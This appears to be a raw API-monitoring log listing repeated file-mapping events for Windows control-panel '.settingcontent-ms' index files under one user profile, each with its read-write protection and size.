Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{950fd00b-c4a9-4465-852a-b1eb51e2e7f6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{955E7FFD-4DD9-4124-96FC-86C3C653DD33}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9B802EF5-59B7-4974-9022-06DC2A9B1677}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9BA8A9A5-F1C1-4F09-AE9A-EFEAA5961BE3}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9C39057F-5CE5-4BAB-BE61-2957A12EEC52}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9c60de1e-e5fc-40f4-a487-460851a8d915}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9c73f5e5-7ae7-4e32-a8e8-8d23b85255bf}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9EF86966-2F35-49BE-A9F6-398E0B844411}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{9fe63afd-59cf-4419-9775-abcc3849f861}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{a0275511-0e86-4eca-97c2-ecd8f1221d08}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1648 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{a3dd4f92-658a-410f-84fd-6fbbbef2fffe}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{A7160DE5-E591-4D98-9BB0-0CAC99D5F2D5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{A73DCDB5-E233-4FC2-8083-6E431939002A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{a8a91a66-3a7d-4424-8d24-04e180695c7a}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AA9D2032-E8FB-4f8c-99C9-09F539AEBD59}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1696 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B123B0AB-2E4E-4325-804A-32F99784DA0B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B1FE5142-DEDD-409B-BCC8-547EC08DE84E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{b2c761c6-29bc-4f19-9251-e6195265baf1}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B6B2793F-F4B9-49FD-B578-212C3C020892}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B7622F10-9A47-4BF2-B6EF-2C20B4510254}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B896819B-CF73-4da0-8F59-6E744A6BCD5F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{B935C3B6-969C-4FC2-B96C-7F06794471AF}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{BABB24A6-0242-4AE5-BD83-C5816526F63D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bb06c0e4-d293-4f75-8a90-cb05b6477eee}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bb64f8a7-bee7-4e1a-ab8d-7d8273f7fdb6}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{BD256B65-94BE-4194-84BF-41D50D0EF26E}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bd84b380-8ca2-1069-ab1d-08000948f534}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1584 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{be122a0e-4503-11da-8bde-f66bad1e3f3a}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{BEC9E135-14C1-4e00-B5C8-899F26833A5A}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{bf782cc9-5a52-4a17-806c-2a894ffeeac5}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C16A18A2-DC4F-4B7D-92F1-14C430AD17DC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C3915CF9-A3D9-4EFD-B209-62C05793EE0F}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C3F521C1-249F-48FD-9D9D-731EA4568776}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C5361E07-6AA3-4453-81BC-93E8F85EABED}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{c555438b-3c23-4769-a71f-b6d3d9b6053a}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{c58c4893-3be0-4b45-abb5-a63e4b8c8651}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1616 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C5AE651D-D027-4D11-8125-595B9933C78B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{C86B1923-8E1F-414B-83DB-94B09BA73E15}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{CD2A5953-36A2-427D-B762-3610F37A5D89}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{CD95D0E3-6B3A-495B-9FDA-57FAD586304D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1744 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{CF081448-68EC-4969-9F8B-BB23B329B712}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d17d1d6d-cc3f-4815-8fe3-607e7d5d10b3}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1712 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D1AF7F5F-18C1-4143-81E5-EDAF02255883}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1728 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d20ea4e1-3957-11d2-a40b-0c5020524153}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1600 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{D4690CFE-6A59-4BAB-BFF7-9ED0D083E798}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms filename = C:\Documents and Settings\FD1HVy\Local Settings\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Classic_{d555645e-d4f8-4c29-a827-d93c859c4f2a}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1648 True 1
Fn
